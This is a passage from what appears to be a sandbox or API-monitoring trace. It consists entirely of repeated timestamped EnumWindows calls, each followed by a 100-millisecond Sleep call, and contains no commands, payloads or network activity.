(lpEnumFunc=0x3d23dd0, lParam=0x540000) [0243.916] Sleep (dwMilliseconds=0x64) [0244.020] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0244.020] Sleep (dwMilliseconds=0x64) [0244.217] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0244.217] Sleep (dwMilliseconds=0x64) [0244.272] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0244.273] Sleep (dwMilliseconds=0x64) [0244.307] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0244.307] Sleep (dwMilliseconds=0x64) [0244.437] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0244.438] Sleep (dwMilliseconds=0x64) [0244.514] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0244.515] Sleep (dwMilliseconds=0x64) [0244.605] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0244.608] Sleep (dwMilliseconds=0x64) [0244.702] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0244.703] Sleep (dwMilliseconds=0x64) [0244.793] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0244.793] Sleep (dwMilliseconds=0x64) [0244.846] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0244.846] Sleep (dwMilliseconds=0x64) [0244.870] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0244.871] Sleep (dwMilliseconds=0x64) [0244.920] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0244.921] Sleep (dwMilliseconds=0x64) [0244.936] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0244.937] Sleep (dwMilliseconds=0x64) [0245.030] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.031] Sleep (dwMilliseconds=0x64) [0245.120] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.121] Sleep (dwMilliseconds=0x64) [0245.183] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.186] Sleep (dwMilliseconds=0x64) [0245.355] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.357] Sleep (dwMilliseconds=0x64) [0245.390] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.391] Sleep (dwMilliseconds=0x64) [0245.417] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.417] Sleep (dwMilliseconds=0x64) [0245.513] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.514] Sleep (dwMilliseconds=0x64) [0245.561] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.562] Sleep (dwMilliseconds=0x64) [0245.608] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.608] Sleep (dwMilliseconds=0x64) [0245.700] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.701] Sleep (dwMilliseconds=0x64) [0245.777] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.777] Sleep (dwMilliseconds=0x64) [0245.796] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.797] Sleep (dwMilliseconds=0x64) [0245.855] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.856] Sleep (dwMilliseconds=0x64) [0245.901] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.902] Sleep (dwMilliseconds=0x64) [0245.981] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0245.982] Sleep (dwMilliseconds=0x64) [0246.029] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.030] Sleep (dwMilliseconds=0x64) [0246.123] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.124] Sleep (dwMilliseconds=0x64) [0246.201] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.202] Sleep (dwMilliseconds=0x64) [0246.232] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.233] Sleep (dwMilliseconds=0x64) [0246.279] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.280] Sleep (dwMilliseconds=0x64) [0246.306] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.309] Sleep (dwMilliseconds=0x64) [0246.327] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.328] Sleep (dwMilliseconds=0x64) [0246.375] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.375] Sleep (dwMilliseconds=0x64) [0246.498] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.499] Sleep (dwMilliseconds=0x64) [0246.546] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.546] Sleep (dwMilliseconds=0x64) [0246.593] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.594] Sleep (dwMilliseconds=0x64) [0246.633] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.675] Sleep (dwMilliseconds=0x64) [0246.728] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.730] Sleep (dwMilliseconds=0x64) [0246.787] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.788] Sleep (dwMilliseconds=0x64) [0246.849] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.850] Sleep (dwMilliseconds=0x64) [0246.857] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.857] Sleep (dwMilliseconds=0x64) [0246.905] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.905] Sleep (dwMilliseconds=0x64) [0246.941] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0246.941] Sleep (dwMilliseconds=0x64) [0247.026] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0247.029] Sleep (dwMilliseconds=0x64) [0247.119] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0247.119] Sleep (dwMilliseconds=0x64) [0247.202] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0247.202] Sleep (dwMilliseconds=0x64) [0247.371] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0247.371] Sleep (dwMilliseconds=0x64) [0247.457] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0247.458] Sleep (dwMilliseconds=0x64) [0247.562] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0247.563] Sleep (dwMilliseconds=0x64) [0247.688] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0247.688] Sleep (dwMilliseconds=0x64) [0247.765] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0247.765] Sleep (dwMilliseconds=0x64) [0247.852] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0247.853] Sleep (dwMilliseconds=0x64) [0247.968] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0247.968] Sleep (dwMilliseconds=0x64) [0248.049] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0248.050] Sleep (dwMilliseconds=0x64) [0248.102] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0248.102] Sleep (dwMilliseconds=0x64) [0248.162] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0248.164] Sleep (dwMilliseconds=0x64) [0248.218] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0248.219] Sleep (dwMilliseconds=0x64) [0248.258] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0248.258] Sleep (dwMilliseconds=0x64) [0248.265] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0248.265] Sleep (dwMilliseconds=0x64) [0248.308] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0248.309] Sleep (dwMilliseconds=0x64) [0248.418] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0248.419] Sleep (dwMilliseconds=0x64) [0248.685] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0248.685] Sleep (dwMilliseconds=0x64) [0248.767] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0248.767] Sleep (dwMilliseconds=0x64) [0248.890] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0248.891] Sleep (dwMilliseconds=0x64) [0248.933] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0248.935] Sleep (dwMilliseconds=0x64) [0248.997] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0248.998] Sleep (dwMilliseconds=0x64) [0249.030] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0249.031] Sleep (dwMilliseconds=0x64) [0249.042] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0249.044] Sleep (dwMilliseconds=0x64) [0249.107] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0249.107] Sleep (dwMilliseconds=0x64) [0249.201] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0249.202] Sleep (dwMilliseconds=0x64) [0249.279] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0249.280] Sleep (dwMilliseconds=0x64) [0249.341] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0249.342] Sleep (dwMilliseconds=0x64) [0249.406] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0249.406] Sleep (dwMilliseconds=0x64) [0249.433] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0249.434] Sleep (dwMilliseconds=0x64) [0249.513] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0249.513] Sleep (dwMilliseconds=0x64) [0249.668] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0249.670] Sleep (dwMilliseconds=0x64) [0249.795] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0249.796] Sleep (dwMilliseconds=0x64) [0249.948] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0249.949] Sleep (dwMilliseconds=0x64) [0250.122] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.122] Sleep (dwMilliseconds=0x64) [0250.198] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.201] Sleep (dwMilliseconds=0x64) [0250.236] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.237] Sleep (dwMilliseconds=0x64) [0250.245] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.245] Sleep (dwMilliseconds=0x64) [0250.264] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.264] Sleep (dwMilliseconds=0x64) [0250.373] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.374] Sleep (dwMilliseconds=0x64) [0250.433] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.433] Sleep (dwMilliseconds=0x64) [0250.529] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.530] Sleep (dwMilliseconds=0x64) [0250.628] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.629] Sleep (dwMilliseconds=0x64) [0250.674] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.674] Sleep (dwMilliseconds=0x64) [0250.717] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.717] Sleep (dwMilliseconds=0x64) [0250.753] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.753] Sleep (dwMilliseconds=0x64) [0250.761] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.761] Sleep (dwMilliseconds=0x64) [0250.826] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.826] Sleep (dwMilliseconds=0x64) [0250.922] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.922] Sleep (dwMilliseconds=0x64) [0250.998] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0250.999] Sleep (dwMilliseconds=0x64) [0251.124] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0251.124] Sleep (dwMilliseconds=0x64) [0251.195] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0251.197] Sleep (dwMilliseconds=0x64) [0251.297] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0251.297] Sleep (dwMilliseconds=0x64) [0251.386] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0251.388] Sleep (dwMilliseconds=0x64) [0251.460] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0251.461] Sleep (dwMilliseconds=0x64) [0251.513] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0251.513] Sleep (dwMilliseconds=0x64) [0251.575] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0251.575] Sleep (dwMilliseconds=0x64) [0251.664] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0251.664] Sleep (dwMilliseconds=0x64) [0251.679] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0251.680] Sleep (dwMilliseconds=0x64) [0251.683] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0251.683] Sleep (dwMilliseconds=0x64) [0251.715] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0251.716] Sleep (dwMilliseconds=0x64) [0251.756] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0251.757] Sleep (dwMilliseconds=0x64) [0251.765] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0251.765] Sleep (dwMilliseconds=0x64) [0251.957] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0251.957] Sleep (dwMilliseconds=0x64) [0252.065] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0252.065] Sleep (dwMilliseconds=0x64) [0252.184] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0252.184] Sleep (dwMilliseconds=0x64) [0252.312] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0252.313] Sleep (dwMilliseconds=0x64) [0252.423] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0252.423] Sleep (dwMilliseconds=0x64) [0252.531] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0252.532] Sleep (dwMilliseconds=0x64) [0252.603] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0252.603] Sleep (dwMilliseconds=0x64) [0252.651] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0252.652] Sleep (dwMilliseconds=0x64) [0252.704] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0252.705] Sleep (dwMilliseconds=0x64) [0252.737] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0252.738] Sleep (dwMilliseconds=0x64) [0252.784] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0252.784] Sleep (dwMilliseconds=0x64) [0252.886] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0252.886] Sleep (dwMilliseconds=0x64) [0252.967] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0252.967] Sleep (dwMilliseconds=0x64) [0253.061] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.061] Sleep (dwMilliseconds=0x64) [0253.137] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.141] Sleep (dwMilliseconds=0x64) [0253.155] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.155] Sleep (dwMilliseconds=0x64) [0253.202] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.203] Sleep (dwMilliseconds=0x64) [0253.248] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.248] Sleep (dwMilliseconds=0x64) [0253.405] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.405] Sleep (dwMilliseconds=0x64) [0253.495] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.498] Sleep (dwMilliseconds=0x64) [0253.592] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.593] Sleep (dwMilliseconds=0x64) [0253.677] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.677] Sleep (dwMilliseconds=0x64) [0253.705] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.706] Sleep (dwMilliseconds=0x64) [0253.748] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.748] Sleep (dwMilliseconds=0x64) [0253.783] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.783] Sleep (dwMilliseconds=0x64) [0253.792] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.792] Sleep (dwMilliseconds=0x64) [0253.873] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.873] Sleep (dwMilliseconds=0x64) [0253.966] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0253.967] Sleep (dwMilliseconds=0x64) [0254.030] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.030] Sleep (dwMilliseconds=0x64) [0254.107] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.108] Sleep (dwMilliseconds=0x64) [0254.201] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.202] Sleep (dwMilliseconds=0x64) [0254.261] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.264] Sleep (dwMilliseconds=0x64) [0254.296] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.297] Sleep (dwMilliseconds=0x64) [0254.307] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.308] Sleep (dwMilliseconds=0x64) [0254.373] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.374] Sleep (dwMilliseconds=0x64) [0254.498] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.499] Sleep (dwMilliseconds=0x64) [0254.578] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.578] Sleep (dwMilliseconds=0x64) [0254.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.667] Sleep (dwMilliseconds=0x64) [0254.821] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.821] Sleep (dwMilliseconds=0x64) [0254.836] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.836] Sleep (dwMilliseconds=0x64) [0254.839] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.839] Sleep (dwMilliseconds=0x64) [0254.889] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.889] Sleep (dwMilliseconds=0x64) [0254.928] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.930] Sleep (dwMilliseconds=0x64) [0254.932] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.932] Sleep (dwMilliseconds=0x64) [0254.951] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0254.952] Sleep (dwMilliseconds=0x64) [0255.045] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0255.046] Sleep (dwMilliseconds=0x64) [0255.138] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0255.138] Sleep (dwMilliseconds=0x64) [0255.230] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0255.231] Sleep (dwMilliseconds=0x64) [0255.328] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0255.329] Sleep (dwMilliseconds=0x64) [0255.404] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0255.404] Sleep (dwMilliseconds=0x64) [0255.535] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0255.535] Sleep (dwMilliseconds=0x64) [0255.622] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0255.623] Sleep (dwMilliseconds=0x64) [0255.688] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0255.688] Sleep (dwMilliseconds=0x64) [0255.757] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0255.758] Sleep (dwMilliseconds=0x64) [0255.831] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0255.832] Sleep (dwMilliseconds=0x64) [0255.923] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0255.924] Sleep (dwMilliseconds=0x64) [0256.101] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0256.101] Sleep (dwMilliseconds=0x64) [0256.127] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0256.127] Sleep (dwMilliseconds=0x64) [0256.168] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0256.168] Sleep (dwMilliseconds=0x64) [0256.200] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0256.201] Sleep (dwMilliseconds=0x64) [0256.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0256.215] Sleep (dwMilliseconds=0x64) [0256.276] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0256.277] Sleep (dwMilliseconds=0x64) [0256.380] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0256.380] Sleep (dwMilliseconds=0x64) [0256.464] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0256.467] Sleep (dwMilliseconds=0x64) [0256.563] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0256.563] Sleep (dwMilliseconds=0x64) [0256.629] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0256.630] Sleep (dwMilliseconds=0x64) [0256.638] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0256.641] Sleep (dwMilliseconds=0x64) [0256.661] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0256.661] Sleep (dwMilliseconds=0x64) [0256.717] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0256.718] Sleep (dwMilliseconds=0x64) [0256.839] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0256.840] Sleep (dwMilliseconds=0x64) [0257.090] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0257.090] Sleep (dwMilliseconds=0x64) [0257.323] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0257.324] Sleep (dwMilliseconds=0x64) [0257.479] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0257.479] Sleep (dwMilliseconds=0x64) [0257.664] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0257.665] Sleep (dwMilliseconds=0x64) [0257.755] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0257.756] Sleep (dwMilliseconds=0x64) [0257.921] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0257.921] Sleep (dwMilliseconds=0x64) [0258.058] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0258.058] Sleep (dwMilliseconds=0x64) [0258.159] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0258.159] Sleep (dwMilliseconds=0x64) [0258.255] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0258.255] Sleep (dwMilliseconds=0x64) [0258.303] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0258.304] Sleep (dwMilliseconds=0x64) [0258.321] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0258.322] Sleep (dwMilliseconds=0x64) [0258.372] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0258.373] Sleep (dwMilliseconds=0x64) [0258.489] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0258.489] Sleep (dwMilliseconds=0x64) [0258.573] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0258.573] Sleep (dwMilliseconds=0x64) [0258.699] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0258.699] Sleep (dwMilliseconds=0x64) [0258.796] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0258.797] Sleep (dwMilliseconds=0x64) [0258.874] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0258.874] Sleep (dwMilliseconds=0x64) [0258.921] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0258.922] Sleep (dwMilliseconds=0x64) [0258.988] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0258.988] Sleep (dwMilliseconds=0x64) [0259.025] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.056] Sleep (dwMilliseconds=0x64) [0259.124] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.125] Sleep (dwMilliseconds=0x64) [0259.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.215] Sleep (dwMilliseconds=0x64) [0259.269] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.269] Sleep (dwMilliseconds=0x64) [0259.307] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.308] Sleep (dwMilliseconds=0x64) [0259.343] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.343] Sleep (dwMilliseconds=0x64) [0259.378] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.379] Sleep (dwMilliseconds=0x64) [0259.388] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.389] Sleep (dwMilliseconds=0x64) [0259.436] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.436] Sleep (dwMilliseconds=0x64) [0259.514] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.514] Sleep (dwMilliseconds=0x64) [0259.621] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.625] Sleep (dwMilliseconds=0x64) [0259.720] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.720] Sleep (dwMilliseconds=0x64) [0259.813] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.814] Sleep (dwMilliseconds=0x64) [0259.936] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.937] Sleep (dwMilliseconds=0x64) [0259.998] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0259.999] Sleep (dwMilliseconds=0x64) [0260.015] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0260.015] Sleep (dwMilliseconds=0x64) [0260.030] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0260.031] Sleep (dwMilliseconds=0x64) [0260.078] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0260.078] Sleep (dwMilliseconds=0x64) [0260.153] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0260.154] Sleep (dwMilliseconds=0x64) [0260.250] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0260.250] Sleep (dwMilliseconds=0x64) [0260.357] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0260.359] Sleep (dwMilliseconds=0x64) [0260.435] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0260.435] Sleep (dwMilliseconds=0x64) [0260.495] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0260.498] Sleep (dwMilliseconds=0x64) [0260.589] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0260.590] Sleep (dwMilliseconds=0x64) [0260.637] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0260.637] Sleep (dwMilliseconds=0x64) [0260.782] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0260.783] Sleep (dwMilliseconds=0x64) [0260.891] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0260.891] Sleep (dwMilliseconds=0x64) [0260.980] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0260.980] Sleep (dwMilliseconds=0x64) [0261.078] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0261.079] Sleep (dwMilliseconds=0x64) [0261.165] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0261.166] Sleep (dwMilliseconds=0x64) [0261.209] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0261.209] Sleep (dwMilliseconds=0x64) [0261.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0261.214] Sleep (dwMilliseconds=0x64) [0261.264] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0261.265] Sleep (dwMilliseconds=0x64) [0261.308] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0261.309] Sleep (dwMilliseconds=0x64) [0261.356] EnumWindows (lpEnumFunc=0x3d23dd0, 